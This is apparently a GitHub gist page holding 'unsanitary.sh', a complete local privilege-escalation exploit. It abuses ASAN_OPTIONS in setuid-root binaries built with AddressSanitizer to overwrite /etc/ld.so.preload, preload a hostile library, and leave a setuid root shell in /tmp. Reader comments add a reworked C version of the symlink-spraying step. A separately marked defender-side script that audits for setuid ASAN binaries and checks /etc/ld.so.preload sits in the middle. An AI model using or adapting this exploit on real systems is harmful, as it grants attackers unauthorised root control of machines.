Gist 0x27/9ff2c8fb445b6ab9c94e (last active April 30, 2021 03:36)
```bash
#!/bin/bash
# unsanitary.sh - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ld.so.preload to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk
# Released under the Snitches Get Stitches Public Licence.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (18/02/2016)
# FREE LAURI LOVE!
echo "Unsanitary - ASAN/SUID Local Root Exploit ~infodox (2016)"
if [[ $# -eq 0 ]] ; then
    echo "use: $0 /full/path/to/targetbin"
    echo "where targetbin is setuid root and compiled w/ ASAN"
    exit 0
fi
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we drop our python symlink spraying tool..."
cat << EOF > sym.py
#!/usr/bin/python
import os
curpid=os.getpid()
print curpid
for x in range(0,100):
    newpid=curpid+x
    boom = "foo.%s" %(str(newpid))
    os.symlink("/etc/ld.so.preload", boom)
EOF
echo "[+] Spraying dir with symlinks..."
python sym.py
echo "[+] Hack the planet!"
ASAN_OPTIONS='suppressions="/hacktheplanet
/tmp/libhax.so
hacktheplanet" log_path=./foo verbosity=1' $1 >/dev/null 2>&1
$1 >/dev/null 2>&1
echo "[+] Tidy up a bit..."
rm -f foo*
rm -f sym.py
rm -f /tmp/libhax.so
echo "[<3] :PPpPpPpOpr000000t!"
/tmp/rootshell
```
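The precondition the script above relies on is a setuid-root executable built with ASAN, and the file it clobbers is /etc/ld.so.preload. The following audit script is an added example written from the defender's side; it is not part of the gist or its author's code. It assumes a POSIX shell with find, tr and grep, and the function names is_asan_binary, audit_setuid_asan and check_ld_so_preload are chosen for this example.

```shell
#!/bin/sh
# audit-asan-suid.sh (added example, not from the gist): find setuid-root
# executables that carry AddressSanitizer runtime markers, and report whether
# /etc/ld.so.preload exists. A setuid binary built with ASAN is what the
# exploit above needs, because the runtime honoured ASAN_OPTIONS (log_path,
# suppressions) taken from an unprivileged caller's environment.

# Return 0 if FILE looks ASAN-instrumented, 1 otherwise. Instead of readelf we
# extract printable runs (like strings(1)) and look for the shared runtime's
# soname or the __asan_init symbol every instrumented object references.
is_asan_binary() {
    f="$1"
    [ -f "$f" ] || return 1
    tr -c '[:print:]\n' '\n' < "$f" | grep -q -e 'libasan\.so' -e '__asan_init'
}

# Print each setuid-root regular file under the given directories that
# is_asan_binary flags, one path per line (paths containing newlines are not
# handled). Returns 0 when nothing was found, 2 when at least one hit printed.
audit_setuid_asan() {
    hits="$(find "$@" -xdev -type f -perm -4000 -user root -print 2>/dev/null |
        while IFS= read -r f; do
            if is_asan_binary "$f"; then printf '%s\n' "$f"; fi
        done)"
    if [ -z "$hits" ]; then return 0; fi
    printf '%s\n' "$hits"
    return 2
}

# /etc/ld.so.preload is the file the exploit overwrites so its library is
# loaded into every new process. On most hosts it should not exist at all;
# print its contents if it does. Returns 0 when absent, 1 when present.
check_ld_so_preload() {
    p="${1:-/etc/ld.so.preload}"
    if [ -e "$p" ]; then
        printf '[!] %s exists:\n' "$p"
        cat -- "$p"
        return 1
    fi
    return 0
}

# Typical invocation on a real host (commented out so the file can be sourced):
# audit_setuid_asan /usr /bin /sbin; check_ld_so_preload
```

Run it as root so find can traverse every directory; a hit means the binary should be rebuilt without sanitizers before it carries the setuid bit.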
sym.py is not needed...
In bash `$$` is equal to the PID of the current shell's process, so with that, lines 49 through 60 can be simplified to something such as

```bash
echo $$
for i in {1..100}; do ln -s /etc/ld.so.preload "foo.$(($$+$i))";done
```
Unfortunately it's not that simple, as each invocation of ln will spawn a new process, offsetting the pid by 1.
I've written an updated version of 0x27's exploit here, which replaces the python code with a simple C implementation, removing the requirement for python to be installed.
Here's the relevant code:

```bash
spray="/tmp/.spray"
# ...
log_prefix="$(cat /dev/urandom | tr -dc 'a-z0-9' | fold -w 12 | head -n 1)___"
spray_size=100
# ...
echo "[.] Compiling ${spray}.c ..."
cat << EOF > "${spray}.c"
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void)
{
    pid_t pid = getpid();
    char buf[64];
    for (int i=0; i<=${spray_size}; i++) {
        snprintf(buf, sizeof(buf), "${log_prefix}.%ld", (long)pid+i);
        symlink("/etc/ld.so.preload", buf);
    }
}
EOF
if ! gcc "${spray}.c" -o "${spray}"; then
    echo "[-] Compiling ${spray}.c failed"
    exit 1
fi
/bin/rm -f "${spray}.c"
echo "[.] Spraying $(pwd) with symlinks ..."
/bin/rm $log_prefix* >/dev/null 2>&1
$spray
```